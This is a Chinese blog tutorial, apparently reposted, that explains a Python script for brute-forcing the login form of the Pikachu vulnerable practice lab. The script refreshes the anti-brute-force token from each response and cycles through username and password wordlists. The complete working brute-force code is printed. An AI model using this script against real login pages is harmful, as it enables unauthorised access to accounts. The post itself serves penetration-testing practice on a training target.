close

大家好,我是虎哥。

測試靶機為Pikachu漏洞練習平台暴力破解模塊下的 「token防爆破?」

春節期間歇了一陣子,吃睡玩看小說。寫這個腳本的起因是因為burp設置帶token的暴力破解我只會用pitchfork草叉模式,要是用cluster bomb集束炸彈模式笛卡兒積那樣就不會了,所以就乾脆把之前寫的腳本加了點東西實現這個功能了,到時候有空再學學多線程,爆破速度就更快了。

關鍵代碼解釋

設置請求頭

5~11行:指定url地址和請求頭,user_token設置首次發送請求包時的token值。

url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"user_token = '8680761fe979039a6f836599906'header = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0', 'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'}

get_token函數獲取token值

13~16行:這個函數返回從響應包中獲取的token

在http響應包中有一個隱藏的標籤裡面有token值:

<input type="hidden" name="token" value="5874161fe8db950ca7993759020" />

第15行:soup.select查找標籤名為input,name為token的元素的value的值。

def get_token(r): soup = BeautifulSoup(r.text, 'html.parser') user_token = soup.select('input[name="token"]')[0]['value'] return user_token

完整代碼:

from bs4 import BeautifulSoupimport requestsfrom requests.models import Responseurl = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"user_token = '8680761fe979039a6f836599906'#proxies = {"http": "http://127.0.0.1:8080"} # 代理設置,方便burp抓包查看和調試header = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0', 'Cookie': 'PHPSESSID=17u0i2fakm84eq9oc24boc8715'}def get_token(r): soup = BeautifulSoup(r.text, 'html.parser') user_token = soup.select('input[name="token"]')[0]['value'] return user_tokenif __name__ == "__main__": f = open('result.csv', 'w') #把爆破結果儲存到文件里,這裡為csv格式 f.write('用戶名' + ',' + '密碼' + ',' + '包長度' + '\n') #給文件設置標題 #遍歷字典文件,Cluster bomb 暴力破解 for admin in open("C:\\Users\\admin\\Documents\\字典\\賬號.txt"): for line in open("C:\\Users\\admin\\Documents\\字典\\密碼.txt"): username = admin.strip() password = line.strip() payload = { #payload為POST的數據 'username': username, 'password': password, 'token': user_token, 'submit': 'Login' } Response = requests.post(url, data=payload, headers=header) result = username + ',' + password + ',' + str(len(Response.text)) #用戶名密碼以及響應包長度 print(result) #輸出到終端 f.write(result + '\n') #輸出到文件 user_token = get_token(Response) #調用get_token函數獲取下一次循環需要的token print('\n---完成---\n') f.close()

運行結果:

查看保存的文件,查看包長度與其他不一樣的數據

這裡csv不會顯示前綴會自動去掉首位0,可以把文件改成txt格式就正常顯示了

嘗試登陸一下,登錄成功。

作者:CVE-檸檬i

來源:blog.csdn.net/weixin_49125123/article/details/122794669

程序員技術交流群
隨着讀者越來越多,虎哥我也建了幾個技術交流群,九分聊技術,一分聊風雪,歡迎有興趣的同學加入我們。
可以長按識別下方二維碼,一定要注意:城市+暱稱+技術方向,根據格式,可以更快捷地通過選擇內容進入群。

▲長按掃描

閱讀更多

用Python寫一個天天酷跑

如何利用Python在網上接單,兼職也能月薪過萬

各位道友,敲下這30個 Python 代碼,念頭立刻通達了!


人生苦短,我用python

【神秘禮包獲取方式】

識別文末二維碼,回覆:1024
arrow
arrow
    全站熱搜
    創作者介紹
    創作者 鑽石舞台 的頭像
    鑽石舞台

    鑽石舞台

    鑽石舞台 發表在 痞客邦 留言(0) 人氣()